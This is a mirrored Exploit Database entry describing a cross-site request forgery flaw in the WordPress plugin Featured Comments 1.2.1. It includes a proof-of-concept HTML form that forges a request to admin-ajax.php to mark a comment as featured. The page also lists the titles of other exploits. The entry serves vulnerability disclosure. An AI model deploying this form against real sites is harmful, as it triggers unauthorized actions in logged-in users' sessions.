WordPress Plugin Featured Comments – Cross-Site Request Forgery

Exploit Database
19 阅读

作者： Tom Adams

日期： 2014-06-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39213/

source: https://www.securityfocus.com/bid/67955/info

Featured Comments plugin for WordPress is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

Featured Comments 1.2.1 is vulnerable; other versions may also be affected. 

<form action=\"http://localhost/wp-admin/admin-ajax.php?action=feature_comments\"; method=\"POST\">
<input type=\"text\" name=\"do\" value=\"feature\">
<input type=\"text\" name=\"comment_id\" value=\"9\">
<input type=\"submit\">
</form>

last Exploits
WordPress Plugin Featured Comments – Cross-Site Request Forgery的更多信息

PHPKit 1.6.1 – ‘mailer.php’ SQL Injection：
Gollos 2.8 – Multiple Cross-Site Scripting Vulnerabilities：
PodcastGenerator 3.2.9 – Blind SSRF via XML Injection：
Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 – Stored XSS：
WHMCompleteSolution (WHMCS) 4.5.2 – ‘googlecheckout.php’ SQL Injection：
PACSOne Server 6.6.2 DICOM Web Viewer – SQL Injection：
opencart 1.5.2.1 – Multiple Vulnerabilities：
Cybertek CMS – Local File Inclusion：